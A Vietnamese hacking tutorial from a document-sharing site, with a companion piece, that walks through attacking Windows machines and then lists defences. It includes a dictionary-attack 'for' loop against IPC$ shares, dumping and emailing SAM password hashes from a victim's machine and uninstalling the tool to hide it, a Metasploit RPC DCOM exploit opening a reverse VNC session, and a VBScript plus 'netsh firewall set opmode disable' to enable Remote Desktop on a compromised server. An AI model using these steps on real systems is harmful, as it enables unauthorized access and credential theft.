1. Trang chủ
  2. » Công Nghệ Thông Tin

Hack Windows toàn tập – Cách phòng chống ppsx

25 410 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 25
Dung lượng 1,77 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Trong bài viết này tôi sẽ trình bày với các bạn những phương thức tấn công một máy tính cài hệ điều hành Windows.. Từ những kiến thức và khả năng tấn công vào máy tính cài hệ điều hành W

Trang 1

1 Hack Windows toàn tập – Cách phòng chống

Hack Windows toàn tập – Cách phòng chống

Windows là hệ điều hành phổ biến nhất trên thế giới, nó luôn tiềm ẩn những lỗi bảo mật Trong bài viết này tôi sẽ trình bày với các bạn những phương thức tấn công một máy tính cài hệ điều hành Windows Từ những kiến thức và khả năng tấn công vào máy tính cài hệ điều hành Windows tôi sẽ đưa ra các giải pháp bảo mật cho hệ thống

Các nội dung trong bài viết:

1 Tấn công Password của tài khoản trong Windows

2 Tấn công máy tính cài Windows thông qua các lỗ hổng bảo mật

Phần I Tấn công Password của tài khoản người dùng trong Windows.

1 Sử dụng lệnh For trong Windows.

- Máy bị tấn công địa chỉ IP: 192.168.1.18, máy sử dụng để tấn công cùng nằm trong mạng 192.168.1.0/24

- Hầu hết tất cả các máy đều chia sẻ tài nguyên trong hệ thống mạng, và có một thư mục được Share ẩn mặc định là thư mục \\computer\IPC$

- Khi ta biết được User trên máy đó là Administrator ta chỉ quan tâm làm thế nào để biết được mật khẩu của tài khoản đó

- Tạo một file từ điển chứa hầu hết các mật khẩu thông dụng – dùng tools Dictionary Generator

Trang 2

để tạo ra bộ từ điển này.

- Cấu tạo của lệnh for:

- For /f "tokens=1" %a in (vnedic.txt) do net use * \\computer\IPC$ /user:"administrator" %a

- Trong đó vnedic.txt là file từ điển đã được tạo, sử dụng Net User để Map ổ

File từ điển tôi để ở ổ I: với tên vnedic.txt Sau khi hệ thống tìm password ở trong file vnedict.txt

đã tìm được password của tài khoản Administrator của máy 192.168.1.8 là "123"

- Có rất nhiều phương pháp tạo ra bộ từ điển để sử dụng lệnh for tấn công vào hệ thống

Windows

- Nhược điểm của phương pháp này là rất chậm để có thể tấn công được một hệ thống máy tính

có mật khẩu phức tạp

Giải pháp chống tấn công sử dụng lệnh For:

- Thiết lập trong Group Policy khi gõ Password sai 5 lần sẽ bị lock 30 phút

2 Giải mã mật khẩu được mã hoá.

a Trên máy Local

Trang 3

- Giả sử bạn không biết mật khẩu của một máy tính trong hệ thống, nhưng bạn lại nhờ người đó

gõ mật khẩu của họ và cho bạn mượn máy tính dùng tạm Và bạn giờ đây là làm thế nào để biết được Password trên máy bạn đang logon

- Rất nhiều phần mềm có thể Exports đoạn mã hoá của Password ra thành một File điển hình là PasswordDump, WinPasswordPro, trong bài viết này tôi trình bày với các bạn sử dụng

WinPasswordPro

Bật chương trình WinPasswordPro lên Import Password từ máy Local

Sau Khi Import Password từ file SAM vào sẽ được

Sau đó ta Export danh sách User và Password đã được mã hoá ra một file txt và gửi vào Mail của chúng ta, sang máy chúng ta cũng dung phần mềm này để giải mã ngược lại

Trang 4

Mở file TXT đã exports ra ta có dữ liệu password đã được mã hoá

Sau khi lấy được dữ liệu User – Password đã mã hoá ta Uninstall chương trình này trên máy nạn nhân để khỏi lộ - rồi gửi file đó vào Mail để về máy của ta Giải mã – đây là công đoạn tốn thời gian Đối với mật khẩu dài 10 ký tự mất khoảng 1 tiếng

- Bật chương trình WinPasswordPro trên máy của chúng ta chọn File -> Import PWDUMP file rồi chọn đường dẫn tới file password được mã hoá

Sau khi Import từ file PWDUMP ta được - Nhấn vào Start ta sẽ có 3 phương thức tấn công Password

+ Brute Force

+ Dictionary

+ Smart Table

Trang 5

Tôi chọn phương thức tấn công Brute Force

Đợi khoảng 15 phút (đây là password do tôi không đặt ký tự đặc biệt, không số, không hoa và 9

ký tự)

- Kết thúc quá trình tôi đã giải mã được file Password đã được mã hoá với: user administrator và Password là vnexperts

Trang 6

b Tấn công máy từ xa.

- Khi chúng ta được ngồi trên máy nạn nhân để Exports Password được mã hoá là đơn giản nhưng thực tế sẽ rất ít khi thực hiện được phương thức này

- Dùng Password Dump chúng ta sẽ lấy được dữ liệu đã được mã hoá từ một máy từ xa

- Ở đây tôi dụng PasswordDump Version 6.1.6

Ở trên tôi sẽ lấy dữ liệu mã hoá Username và Password từ máy tính 192.168.1.156 dung PWDump và out dữ liệu đó ra file: vnehack.txt tại ổ C: dùng lệnh Type xem dữ liêụ của file đó

Trang 7

Sau Khi đã có dữ liệu này ta lại sử dụng WinPasswordPro để giải mã Và sau khi ta có tài khoản User Administrator và Password của nó thì việc làm gì là tuỳ thuộc vào chúng ta.

- Giải pháp phòng chống hình thức tấn công này:

+ Đề phòng những người truy cập vào máy tính của chúng ta

+ Đặt Password dài trên 14 ký tự và có đầy đủ các ký tự: Đặc biệt, hoa, số, thường

+ Enable Firewall lên để chống PasswordDUMP, Cài đặt và cập nhật các bản vá lỗi mới nhất từ nhà sản xuất

+ Cài đặt tối thiểu một chương trình diệt Virus mạnh

Vô hiệu hoá PWdump – nhưng lưu ý khi kẻ tấn công có một tài khoản trong hệ thống thì lại hoàntoàn khác chúng sẽ vượt qua hầu hết các phòng chống bảo mật: trong trường hợp này tôi có một User bình thường với tên vne tôi có thể Exports toàn bộ dữ liệu Username Password được

mã hoá ở máy đích

Phần II Tấn công hệ thống Windows qua lỗ hổng bảo mật.

- Đầu tiên chúng ta phải tìm những lỗ hổng bảo mật

- Khai thác lỗ hổng đã tìm được

1 Dùng Retina Network Security Scanner 5.1 để tìm lỗ hổng trên hệ thống.

Bật chương trình Retina Network Security Scanner lên:

Chúng ta muốn tìm kiếm trong hệ thống mạng những máy nào đang Online vào phần Discover

Để phát hiện ra lỗ hổng bảo mật sử dụng Tab Audit

Trang 8

Tôi sẽ sử dụng chương trình này để kiểm tra máy 192.168.1.8

Nhấn Start - Chọn Scan Template là chế độ Complete Scan:

Đợi một nát tôi được kết quả thật bất ngờ: máy tính 192.168.1.8 bị rất nhiều lỗ hổng bảo mật

- Tôi phát hiện ra lỗi nguy hiểm trên máy chưa được Fix trên Service RPC là: Windows RPC DCOM Multiple Vulerabilities

- Đọc thêm phần mở rộng về lỗi này tôi phát hiện ra lỗi này cho phép ta truy cập bất hợp pháp tới máy tính đó

Trang 9

Retina Network Security Scanner là phần mềm rất hiệu quả để Scan hệ thống và phát hiện ra các

lỗ hổng bảo mật – Đây là phần mềm có bản quyền

2 Sử dụng Metasploit để khai thác.

- Những lỗ hổng vừa được Retina phát hiện giờ chúng ta sẽ sử dụng Metasploit để khai thác chúng, ở đây tôi dung bản metasploit 2.7 - Hiện nay có bản 3.0

Sau khi cài đặt MetaSploit tôi bật giao diên Web bằng cách dưới đây:

- Sau bật MSFWeb tôi vào IE gõ địa chỉ: http://127.0.0.1:55555

Trang 10

- Lựa trọn trong Filter Modules là Windows 2003

Trong những lỗi tìm thấy và có thể khai thác bởi MetaSploit trên Windows 2003 tôi tìm thấy lỗi RPC Service

Nhấn vào lỗ hổng bảo mật này

Trang 11

Chương trình thong báo lỗ hổng bảo mật này sẽ được khai thác trên các hệ điều hành NT, 2K,

XP, và 2K3

Nhấn vào đó hệ thống sẽ cho phép chúng ta sử dụng các chương trình dưới đây để khai thác vào

lỗ hổng bảo mật này

Tôi lựa chọn Win32_Reverse_vncinject

Sauk hi tôi lựa chọn sử dụng vncinject tôi lựa chọn máy đích cần Sploit là: 192.168.1.8

Trang 12

Nhấn Exploit để khai thác lỗ hổng bảo mật trên

Kết quả thật tuyệt vời tôi đã Remote Desktop đến máy đó mà không cần thong qua bất cứ phương thức xác thực nào, và giờ tôi đã toàn quyền với máy tính này

Một kết quả làm đau đầu các nhà bảo mật nhưng chúng ta không phải không có giải pháp phòngchống

- Cách phòng chống các lỗi bảo mật là:

+ Luôn update các bản vá lỗi mới nhất từ nhà sản xuất

+ Enable Firewall chỉ mở những cổng cần thiết cho các ứng dụng

+ Có thiết bị IDS phát hiện xâm nhập

+ Có Firewall chống Scan các Service đang chạy

Trang 13

Theo Vnexperts Research Department

View more latest threads same category:

o Các mật khẩu như thế nào được coi là chắc

o Chặn hacker SQL Injection với ASP

o Hack Windows toàn tập – Cách phòng chống

o Desktop Phishing

o Mạng BotNet Nền tảng và Cách tạo “Bot”

o PFSENSE : Load Balancing & Failover With

o Những dữ liệu nào được mã hóa khi dùng

o BackTrack4 Beta release

o BẬt tính nĂng remote desktop tỪ xa

o Một số công cụ xem Password

Mr.BLACKSPY

Certificate : Microsoft Basic, Cisco Basic

Mail Contact : hieuvd@technet.vn

http://itlab.com.vn => Diễn đàn CNTT cung cấp các giải pháp và công nghệ Microsoft mới nhấthttp://technet.vn => Cập nhật thông tin công nghệ 24/24

1 BẬt tính nĂng remote desktop tỪ xa

Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền

administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên

Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3

B1 Trên Server kiểm tra remote desktop chưa bật

Trang 14

B2 Trên máy Attacker, telnet vào Server

Trang 15

B3 Chuẩn bị sẵn file VBscript để enable Remote Desktop

Trang 16

Nội dung file VBScript remote.vbs

machine = "."

cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"

query = "select * from Win32_TerminalServiceSetting"

value_to_set = 1 ' 0=off, 1=on

set cimv2 = GetObject( cimv2_string )

set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next B4 Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại

Trang 17

B5 Dùng lệnh dir kiểm tra

Trang 18

B6 Chạy file remote.vbs để bật remote desktop

Trang 19

B7 Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe (3389 là port Remote desktop)

Trang 20

B8 Trên Server kiểm tra tính năng Remote Desktop đã được bật

Trang 21

B9 Tắt firewall của Server

Sử dụng lệnh : Netsh firewall set opmode disable

Trang 22

B10 Từ máy attacker, chạy remote desktop client để kết nối với Server

Sử dụng lệnh rdesktop [hostname]

Trang 23

B11 Nhập username/password của Administrator

Trang 24

B12 Truy cập thành công với quyền Administrators

Trang 25

Have a nice day

Đào Duy Hiếu

View more latest threads same category:

o Các mật khẩu như thế nào được coi là chắc

o Chặn hacker SQL Injection với ASP

o Hack Windows toàn tập – Cách phòng chống

o Desktop Phishing

o Mạng BotNet Nền tảng và Cách tạo “Bot”

o PFSENSE : Load Balancing & Failover With

o Những dữ liệu nào được mã hóa khi dùng

o BackTrack4 Beta release

o BẬt tính nĂng remote desktop tỪ xa

o Một số công cụ xem Password

Proud husband and father of 3 girls

Ngày đăng: 02/07/2014, 00:20

TỪ KHÓA LIÊN QUAN

w